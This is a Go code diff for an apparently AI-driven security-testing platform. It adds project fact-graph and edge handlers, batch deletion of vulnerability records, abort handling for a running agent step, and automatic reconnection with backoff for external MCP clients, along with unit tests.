if v := c.Query("exclude_deprecated"); v == "0" || v == "false" {
|
||||||
|
excludeDeprecated = false
|
||||||
|
}
|
||||||
|
graph, err := project.BuildProjectFactGraph(h.db, projectID, view, excludeDeprecated)
|
||||||
|
if err != nil {
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if graph.Nodes == nil {
|
||||||
|
graph.Nodes = []database.ProjectFactGraphNode{}
|
||||||
|
}
|
||||||
|
if graph.Edges == nil {
|
||||||
|
graph.Edges = []database.ProjectFactGraphEdge{}
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, graph)
|
||||||
}
|
}
|
||||||
|
|
||||||
// CreateFact POST /api/projects/:id/facts
|
// CreateFact POST /api/projects/:id/facts
|
||||||
@@ -285,8 +419,9 @@ func (h *ProjectHandler) CreateFact(c *gin.Context) {
|
|||||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
projectID := c.Param("id")
|
||||||
f := &database.ProjectFact{
|
f := &database.ProjectFact{
|
||||||
ProjectID: c.Param("id"),
|
ProjectID: projectID,
|
||||||
FactKey: req.FactKey,
|
FactKey: req.FactKey,
|
||||||
Category: req.Category,
|
Category: req.Category,
|
||||||
Summary: req.Summary,
|
Summary: req.Summary,
|
||||||
@@ -300,16 +435,24 @@ func (h *ProjectHandler) CreateFact(c *gin.Context) {
|
|||||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, created)
|
explicitLinks := req.Links != nil || req.LinksText != nil
|
||||||
|
if err := h.applyFactLinksAfterUpsert(projectID, created, req.Links, req.LinksText, explicitLinks, !explicitLinks); err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
created, _ = h.db.GetProjectFactByKey(projectID, created.FactKey)
|
||||||
|
c.JSON(http.StatusOK, h.factResponseWithLinks(projectID, created, true))
|
||||||
}
|
}
|
||||||
|
|
||||||
// UpdateFact PUT /api/projects/:id/facts/:factId
|
// UpdateFact PUT /api/projects/:id/facts/:factId
|
||||||
func (h *ProjectHandler) UpdateFact(c *gin.Context) {
|
func (h *ProjectHandler) UpdateFact(c *gin.Context) {
|
||||||
|
projectID := c.Param("id")
|
||||||
existing, err := h.db.GetProjectFact(c.Param("factId"))
|
existing, err := h.db.GetProjectFact(c.Param("factId"))
|
||||||
if err != nil || existing.ProjectID != c.Param("id") {
|
if err != nil || existing.ProjectID != projectID {
|
||||||
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
|
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
oldFactKey := existing.FactKey
|
||||||
var req updateFactRequest
|
var req updateFactRequest
|
||||||
if err := c.ShouldBindJSON(&req); err != nil {
|
if err := c.ShouldBindJSON(&req); err != nil {
|
||||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
@@ -345,7 +488,29 @@ func (h *ProjectHandler) UpdateFact(c *gin.Context) {
|
|||||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, updated)
|
if oldFactKey != updated.FactKey {
|
||||||
|
if err := h.db.RenameProjectFactKeyEdges(projectID, oldFactKey, updated.FactKey); err != nil {
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if req.Links != nil || req.LinksText != nil {
|
||||||
|
var links []factLinkRequest
|
||||||
|
if req.Links != nil {
|
||||||
|
links = *req.Links
|
||||||
|
}
|
||||||
|
if err := h.applyFactLinksAfterUpsert(projectID, updated, links, req.LinksText, true, false); err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
} else if req.ClearBody || req.Body != nil {
|
||||||
|
if err := h.applyFactLinksAfterUpsert(projectID, updated, nil, nil, false, true); err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
updated, _ = h.db.GetProjectFactByKey(projectID, updated.FactKey)
|
||||||
|
c.JSON(http.StatusOK, h.factResponseWithLinks(projectID, updated, true))
|
||||||
}
|
}
|
||||||
|
|
||||||
// DeleteFact DELETE /api/projects/:id/facts/:factId
|
// DeleteFact DELETE /api/projects/:id/facts/:factId
|
||||||
@@ -398,3 +563,82 @@ func (h *ProjectHandler) RestoreFact(c *gin.Context) {
|
|||||||
}
|
}
|
||||||
c.JSON(http.StatusOK, gin.H{"success": true})
|
c.JSON(http.StatusOK, gin.H{"success": true})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
type createFactEdgeRequest struct {
|
||||||
|
SourceFactKey string `json:"source_fact_key" binding:"required"`
|
||||||
|
TargetFactKey string `json:"target_fact_key" binding:"required"`
|
||||||
|
EdgeType string `json:"edge_type" binding:"required"`
|
||||||
|
Confidence string `json:"confidence"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListFactEdges GET /api/projects/:id/fact-edges
|
||||||
|
func (h *ProjectHandler) ListFactEdges(c *gin.Context) {
|
||||||
|
projectID := c.Param("id")
|
||||||
|
edges, err := h.db.ListProjectFactEdgesByProject(projectID)
|
||||||
|
if err != nil {
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if edges == nil {
|
||||||
|
edges = []*database.ProjectFactEdge{}
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, edges)
|
||||||
|
}
|
||||||
|
|
||||||
|
// CreateFactEdge POST /api/projects/:id/fact-edges
|
||||||
|
func (h *ProjectHandler) CreateFactEdge(c *gin.Context) {
|
||||||
|
projectID := c.Param("id")
|
||||||
|
var req createFactEdgeRequest
|
||||||
|
if err := c.ShouldBindJSON(&req); err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
edge, err := h.db.AddProjectFactEdge(projectID, database.ProjectFactEdgeInput{
|
||||||
|
To: req.TargetFactKey,
|
||||||
|
Type: req.EdgeType,
|
||||||
|
Confidence: req.Confidence,
|
||||||
|
}, req.SourceFactKey, "")
|
||||||
|
if err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if f, err := h.db.GetProjectFactByKey(projectID, req.TargetFactKey); err == nil {
|
||||||
|
in, _ := h.db.ListIncomingProjectFactEdges(projectID, req.TargetFactKey)
|
||||||
|
f.Body = project.SyncBodyLinksSection(f.Body, in)
|
||||||
|
_, _ = h.db.UpsertProjectFact(f)
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, edge)
|
||||||
|
}
|
||||||
|
|
||||||
|
// DeleteFactEdge DELETE /api/projects/:id/fact-edges/:edgeId
|
||||||
|
func (h *ProjectHandler) DeleteFactEdge(c *gin.Context) {
|
||||||
|
projectID := c.Param("id")
|
||||||
|
edgeID := c.Param("edgeId")
|
||||||
|
edge, err := h.db.GetProjectFactEdge(edgeID)
|
||||||
|
if err != nil || edge.ProjectID != projectID {
|
||||||
|
c.JSON(http.StatusNotFound, gin.H{"error": "边不存在"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if err := h.db.DeleteProjectFactEdge(edgeID); err != nil {
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if f, err := h.db.GetProjectFactByKey(projectID, edge.TargetFactKey); err == nil {
|
||||||
|
in, _ := h.db.ListIncomingProjectFactEdges(projectID, edge.TargetFactKey)
|
||||||
|
f.Body = project.SyncBodyLinksSection(f.Body, in)
|
||||||
|
_, _ = h.db.UpsertProjectFact(f)
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, gin.H{"success": true})
|
||||||
|
}
|
||||||
|
|
||||||
|
// PromoteAttackChain POST /api/projects/:id/promote-attack-chain/:conversationId
|
||||||
|
func (h *ProjectHandler) PromoteAttackChain(c *gin.Context) {
|
||||||
|
projectID := c.Param("id")
|
||||||
|
conversationID := c.Param("conversationId")
|
||||||
|
result, err := attackchain.PromoteToProject(h.db, projectID, conversationID)
|
||||||
|
if err != nil {
|
||||||
|
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.JSON(http.StatusOK, result)
|
||||||
|
}
|
||||||
|
|||||||
@@ -30,3 +30,19 @@ func (h *AgentHandler) projectBlackboardBlock(conversationID string) string {
|
|||||||
}
|
}
|
||||||
return strings.TrimSpace(block)
|
return strings.TrimSpace(block)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// conversationProjectID 返回对话绑定的项目 ID;未绑定或查询失败时返回空字符串。
|
||||||
|
func (h *AgentHandler) conversationProjectID(conversationID string) string {
|
||||||
|
if h == nil || h.db == nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
conversationID = strings.TrimSpace(conversationID)
|
||||||
|
if conversationID == "" {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
projectID, err := h.db.GetConversationProjectID(conversationID)
|
||||||
|
if err != nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
return strings.TrimSpace(projectID)
|
||||||
|
}
|
||||||
|
|||||||
@@ -314,7 +314,7 @@ func (h *RobotHandler) resolveProjectByIDOrName(idOrName string) (*database.Proj
|
|||||||
if p, err := h.db.GetProject(idOrName); err == nil {
|
if p, err := h.db.GetProject(idOrName); err == nil {
|
||||||
return p, ""
|
return p, ""
|
||||||
}
|
}
|
||||||
list, err := h.db.ListProjects("", 200, 0)
|
list, err := h.db.ListProjects("", "", 200, 0)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, "查询项目失败: " + err.Error()
|
return nil, "查询项目失败: " + err.Error()
|
||||||
}
|
}
|
||||||
@@ -353,7 +353,7 @@ func (h *RobotHandler) cmdProjects() string {
|
|||||||
if !h.projectsEnabled() {
|
if !h.projectsEnabled() {
|
||||||
return "项目功能未启用(config.project.enabled)。"
|
return "项目功能未启用(config.project.enabled)。"
|
||||||
}
|
}
|
||||||
list, err := h.db.ListProjects("", 50, 0)
|
list, err := h.db.ListProjects("", "", 50, 0)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return "获取项目列表失败: " + err.Error()
|
return "获取项目列表失败: " + err.Error()
|
||||||
}
|
}
|
||||||
@@ -447,7 +447,7 @@ func (h *RobotHandler) cmdUnbindProject(platform, userID string) string {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func (h *RobotHandler) cmdList() string {
|
func (h *RobotHandler) cmdList() string {
|
||||||
convs, err := h.db.ListConversations(50, 0, "")
|
convs, err := h.db.ListConversations(50, 0, "", "")
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return "获取对话列表失败: " + err.Error()
|
return "获取对话列表失败: " + err.Error()
|
||||||
}
|
}
|
||||||
@@ -594,6 +594,9 @@ func (h *RobotHandler) cmdDelete(platform, userID, convID string) string {
|
|||||||
h.mu.Unlock()
|
h.mu.Unlock()
|
||||||
h.deleteSessionBinding(sk)
|
h.deleteSessionBinding(sk)
|
||||||
}
|
}
|
||||||
|
if h.agentHandler != nil {
|
||||||
|
h.agentHandler.CancelRunningTaskForConversation(convID)
|
||||||
|
}
|
||||||
if err := h.db.DeleteConversation(convID); err != nil {
|
if err := h.db.DeleteConversation(convID); err != nil {
|
||||||
return "删除失败: " + err.Error()
|
return "删除失败: " + err.Error()
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -37,6 +37,11 @@ type AgentTask struct {
|
|||||||
// InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空)
|
// InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空)
|
||||||
InterruptContinueNote string `json:"-"`
|
InterruptContinueNote string `json:"-"`
|
||||||
|
|
||||||
|
// activeEinoExecuteCancel 当前进行中的 Eino filesystem execute 取消函数(与 MCP 工具并行,供中断并继续)
|
||||||
|
activeEinoExecuteCancel context.CancelFunc
|
||||||
|
// activeEinoExecuteAbortNote AbortActiveEinoExecute 写入的用户说明,由 execute 收尾时合并进工具结果
|
||||||
|
activeEinoExecuteAbortNote string
|
||||||
|
|
||||||
cancel func(error)
|
cancel func(error)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -70,6 +75,69 @@ func (m *AgentTaskManager) UnregisterRunningTool(conversationID, executionID str
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// RegisterActiveEinoExecute 登记进行中的 Eino filesystem execute(每会话同时仅一条)。
|
||||||
|
func (m *AgentTaskManager) RegisterActiveEinoExecute(conversationID string, cancel context.CancelFunc) {
|
||||||
|
conversationID = strings.TrimSpace(conversationID)
|
||||||
|
if conversationID == "" || cancel == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||||
|
t.activeEinoExecuteCancel = cancel
|
||||||
|
t.activeEinoExecuteAbortNote = ""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// UnregisterActiveEinoExecute execute 正常结束或已取消后清除登记。
|
||||||
|
func (m *AgentTaskManager) UnregisterActiveEinoExecute(conversationID string) {
|
||||||
|
conversationID = strings.TrimSpace(conversationID)
|
||||||
|
if conversationID == "" {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||||
|
t.activeEinoExecuteCancel = nil
|
||||||
|
t.activeEinoExecuteAbortNote = ""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// AbortActiveEinoExecute 终止当前 Eino execute 并暂存用户说明(与 MCP 工具终止一致)。
|
||||||
|
func (m *AgentTaskManager) AbortActiveEinoExecute(conversationID, note string) bool {
|
||||||
|
conversationID = strings.TrimSpace(conversationID)
|
||||||
|
if conversationID == "" {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
m.mu.Lock()
|
||||||
|
t, ok := m.tasks[conversationID]
|
||||||
|
if !ok || t == nil || t.activeEinoExecuteCancel == nil {
|
||||||
|
m.mu.Unlock()
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
t.activeEinoExecuteAbortNote = strings.TrimSpace(note)
|
||||||
|
cancel := t.activeEinoExecuteCancel
|
||||||
|
m.mu.Unlock()
|
||||||
|
cancel()
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// TakeEinoExecuteAbortNote 读取并清空 execute 终止说明(execute 收尾时调用一次)。
|
||||||
|
func (m *AgentTaskManager) TakeEinoExecuteAbortNote(conversationID string) string {
|
||||||
|
conversationID = strings.TrimSpace(conversationID)
|
||||||
|
if conversationID == "" {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
if t, ok := m.tasks[conversationID]; ok && t != nil {
|
||||||
|
n := t.activeEinoExecuteAbortNote
|
||||||
|
t.activeEinoExecuteAbortNote = ""
|
||||||
|
return n
|
||||||
|
}
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
// SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。
|
// SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。
|
||||||
func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) {
|
func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) {
|
||||||
conversationID = strings.TrimSpace(conversationID)
|
conversationID = strings.TrimSpace(conversationID)
|
||||||
|
|||||||
@@ -0,0 +1,40 @@
|
|||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestAbortActiveEinoExecute(t *testing.T) {
|
||||||
|
m := NewAgentTaskManager()
|
||||||
|
conv := "conv-eino-exec-abort"
|
||||||
|
ctx, cancel := context.WithCancel(context.Background())
|
||||||
|
_, err := m.StartTask(conv, "test", func(error) {})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("StartTask: %v", err)
|
||||||
|
}
|
||||||
|
m.RegisterActiveEinoExecute(conv, cancel)
|
||||||
|
|
||||||
|
done := make(chan struct{})
|
||||||
|
go func() {
|
||||||
|
<-ctx.Done()
|
||||||
|
close(done)
|
||||||
|
}()
|
||||||
|
|
||||||
|
if !m.AbortActiveEinoExecute(conv, "跳过域名收集") {
|
||||||
|
t.Fatal("expected abort to succeed")
|
||||||
|
}
|
||||||
|
select {
|
||||||
|
case <-done:
|
||||||
|
case <-time.After(2 * time.Second):
|
||||||
|
t.Fatal("execute cancel did not propagate")
|
||||||
|
}
|
||||||
|
if got := m.TakeEinoExecuteAbortNote(conv); got != "跳过域名收集" {
|
||||||
|
t.Fatalf("abort note = %q, want 跳过域名收集", got)
|
||||||
|
}
|
||||||
|
m.UnregisterActiveEinoExecute(conv)
|
||||||
|
if m.AbortActiveEinoExecute(conv, "") {
|
||||||
|
t.Fatal("second abort should fail when no active execute")
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -311,6 +311,38 @@ func (h *VulnerabilityHandler) DeleteVulnerability(c *gin.Context) {
|
|||||||
c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
|
c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// BatchDeleteVulnerabilities 按当前筛选条件批量删除漏洞
|
||||||
|
func (h *VulnerabilityHandler) BatchDeleteVulnerabilities(c *gin.Context) {
|
||||||
|
filter := parseVulnerabilityListFilter(c)
|
||||||
|
|
||||||
|
total, err := h.db.CountVulnerabilities(filter)
|
||||||
|
if err != nil {
|
||||||
|
h.logger.Error("统计待删除漏洞失败", zap.Error(err))
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if total == 0 {
|
||||||
|
c.JSON(http.StatusOK, gin.H{"message": "当前筛选条件下没有可删除的漏洞", "deleted": 0})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
deleted, err := h.db.DeleteVulnerabilitiesByFilter(filter)
|
||||||
|
if err != nil {
|
||||||
|
h.logger.Error("批量删除漏洞失败", zap.Error(err), zap.Int("count", total))
|
||||||
|
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
if h.audit != nil {
|
||||||
|
h.audit.RecordOK(c, "vulnerability", "delete_batch", "批量删除漏洞记录", "vulnerability", "", map[string]interface{}{
|
||||||
|
"deleted": deleted,
|
||||||
|
"filter": filter,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
c.JSON(http.StatusOK, gin.H{"message": "批量删除成功", "deleted": deleted})
|
||||||
|
}
|
||||||
|
|
||||||
// GetVulnerabilityStats 获取漏洞统计
|
// GetVulnerabilityStats 获取漏洞统计
|
||||||
func (h *VulnerabilityHandler) GetVulnerabilityStats(c *gin.Context) {
|
func (h *VulnerabilityHandler) GetVulnerabilityStats(c *gin.Context) {
|
||||||
filter := parseVulnerabilityListFilter(c)
|
filter := parseVulnerabilityListFilter(c)
|
||||||
|
|||||||
@@ -190,6 +190,23 @@ func (c *lazySDKClient) Close() error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// markDisconnected 在检测到传输层断连时关闭底层 session,避免 IsConnected 仍返回 true。
|
||||||
|
func (c *lazySDKClient) markDisconnected() {
|
||||||
|
c.mu.Lock()
|
||||||
|
inner := c.inner
|
||||||
|
sessionCancel := c.sessionCancel
|
||||||
|
c.inner = nil
|
||||||
|
c.sessionCancel = nil
|
||||||
|
c.mu.Unlock()
|
||||||
|
if sessionCancel != nil {
|
||||||
|
sessionCancel()
|
||||||
|
}
|
||||||
|
if inner != nil {
|
||||||
|
_ = inner.Close()
|
||||||
|
}
|
||||||
|
c.setStatus("disconnected")
|
||||||
|
}
|
||||||
|
|
||||||
func (c *sdkClient) setStatus(s string) {
|
func (c *sdkClient) setStatus(s string) {
|
||||||
c.mu.Lock()
|
c.mu.Lock()
|
||||||
defer c.mu.Unlock()
|
defer c.mu.Unlock()
|
||||||
|
|||||||
@@ -0,0 +1,192 @@
|
|||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
const (
|
||||||
|
// externalReconnectMinInterval 两次自动重连之间的最短间隔
|
||||||
|
externalReconnectMinInterval = 30 * time.Second
|
||||||
|
// externalReconnectMaxBackoff 指数退避上限
|
||||||
|
externalReconnectMaxBackoff = 5 * time.Minute
|
||||||
|
)
|
||||||
|
|
||||||
|
// isConnectionDeadError 判断错误是否表示底层传输已断开(而非调用方主动取消或超时)。
|
||||||
|
func isConnectionDeadError(err error) bool {
|
||||||
|
if err == nil {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if errors.Is(err, io.EOF) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
s := strings.ToLower(err.Error())
|
||||||
|
return strings.Contains(s, "eof") ||
|
||||||
|
strings.Contains(s, "client is closing") ||
|
||||||
|
strings.Contains(s, "connection closed") ||
|
||||||
|
strings.Contains(s, "connection reset") ||
|
||||||
|
strings.Contains(s, "broken pipe")
|
||||||
|
}
|
||||||
|
|
||||||
|
// handleConnectionDead 在 ListTools/CallTool 等操作失败且判定为断连时,标记客户端并调度重连。
|
||||||
|
func (m *ExternalMCPManager) handleConnectionDead(name string, client ExternalMCPClient, err error) {
|
||||||
|
if !isConnectionDeadError(err) {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
m.logger.Warn("检测到外部MCP连接已断开,将尝试自动重连",
|
||||||
|
zap.String("name", name),
|
||||||
|
zap.Error(err),
|
||||||
|
)
|
||||||
|
m.markClientDisconnected(name, client, err)
|
||||||
|
m.scheduleReconnect(name)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) markClientDisconnected(name string, client ExternalMCPClient, err error) {
|
||||||
|
if lazy, ok := client.(*lazySDKClient); ok {
|
||||||
|
lazy.markDisconnected()
|
||||||
|
}
|
||||||
|
m.mu.Lock()
|
||||||
|
if err != nil {
|
||||||
|
m.errors[name] = "连接已断开: " + err.Error()
|
||||||
|
}
|
||||||
|
m.mu.Unlock()
|
||||||
|
m.toolCountsMu.Lock()
|
||||||
|
m.toolCounts[name] = 0
|
||||||
|
m.toolCountsMu.Unlock()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) onClientConnected(name string) {
|
||||||
|
m.clearReconnectState(name)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) clearReconnectState(name string) {
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
delete(m.reconnectAttempts, name)
|
||||||
|
delete(m.reconnectLastTry, name)
|
||||||
|
delete(m.reconnecting, name)
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) reconnectBackoff(attempts int) time.Duration {
|
||||||
|
if attempts <= 0 {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
d := externalReconnectMinInterval
|
||||||
|
for i := 1; i < attempts && d < externalReconnectMaxBackoff; i++ {
|
||||||
|
d *= 2
|
||||||
|
}
|
||||||
|
if d > externalReconnectMaxBackoff {
|
||||||
|
return externalReconnectMaxBackoff
|
||||||
|
}
|
||||||
|
return d
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) scheduleReconnect(name string) {
|
||||||
|
m.mu.RLock()
|
||||||
|
cfg, exists := m.configs[name]
|
||||||
|
enabled := exists && m.isEnabled(cfg)
|
||||||
|
m.mu.RUnlock()
|
||||||
|
if !enabled {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
go m.tryReconnect(name)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) tryReconnect(name string) {
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
if m.reconnecting[name] {
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
attempts := m.reconnectAttempts[name]
|
||||||
|
if wait := m.reconnectBackoff(attempts); wait > 0 {
|
||||||
|
if last, ok := m.reconnectLastTry[name]; ok {
|
||||||
|
if elapsed := time.Since(last); elapsed < wait {
|
||||||
|
remaining := wait - elapsed
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
m.scheduleReconnectAfter(name, remaining)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
m.reconnecting[name] = true
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
|
||||||
|
defer func() {
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
delete(m.reconnecting, name)
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
}()
|
||||||
|
|
||||||
|
m.mu.RLock()
|
||||||
|
cfg, exists := m.configs[name]
|
||||||
|
enabled := exists && m.isEnabled(cfg)
|
||||||
|
client, hasClient := m.clients[name]
|
||||||
|
connecting := hasClient && client.GetStatus() == "connecting"
|
||||||
|
m.mu.RUnlock()
|
||||||
|
|
||||||
|
if !enabled {
|
||||||
|
m.logger.Debug("跳过自动重连(外部MCP已停用)", zap.String("name", name))
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if connecting {
|
||||||
|
m.logger.Debug("跳过自动重连(连接正在进行中)", zap.String("name", name))
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
m.reconnectLastTry[name] = time.Now()
|
||||||
|
m.reconnectAttempts[name] = attempts + 1
|
||||||
|
attemptNum := m.reconnectAttempts[name]
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
|
||||||
|
m.logger.Info("正在自动重连外部MCP",
|
||||||
|
zap.String("name", name),
|
||||||
|
zap.Int("attempt", attemptNum),
|
||||||
|
)
|
||||||
|
|
||||||
|
if err := m.startClient(name, true); err != nil {
|
||||||
|
m.logger.Warn("自动重连外部MCP失败",
|
||||||
|
zap.String("name", name),
|
||||||
|
zap.Error(err),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// scheduleReconnectAfterFailure 在自动重连失败后,按当前退避间隔预约下一次重试。
|
||||||
|
func (m *ExternalMCPManager) scheduleReconnectAfterFailure(name string) {
|
||||||
|
m.mu.RLock()
|
||||||
|
cfg, exists := m.configs[name]
|
||||||
|
enabled := exists && m.isEnabled(cfg)
|
||||||
|
m.mu.RUnlock()
|
||||||
|
if !enabled {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
wait := m.reconnectBackoff(m.reconnectAttempts[name])
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
m.logger.Info("自动重连失败,将按退避间隔再次尝试",
|
||||||
|
zap.String("name", name),
|
||||||
|
zap.Duration("after", wait),
|
||||||
|
)
|
||||||
|
m.scheduleReconnectAfter(name, wait)
|
||||||
|
}
|
||||||
|
|
||||||
|
// scheduleReconnectAfter 在 delay 后触发 tryReconnect(delay<=0 时立即执行)。
|
||||||
|
func (m *ExternalMCPManager) scheduleReconnectAfter(name string, delay time.Duration) {
|
||||||
|
if delay <= 0 {
|
||||||
|
go m.tryReconnect(name)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
time.AfterFunc(delay, func() {
|
||||||
|
m.tryReconnect(name)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,215 @@
|
|||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/config"
|
||||||
|
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestIsConnectionDeadError(t *testing.T) {
|
||||||
|
t.Parallel()
|
||||||
|
cases := []struct {
|
||||||
|
name string
|
||||||
|
err error
|
||||||
|
want bool
|
||||||
|
}{
|
||||||
|
{"nil", nil, false},
|
||||||
|
{"eof", io.EOF, true},
|
||||||
|
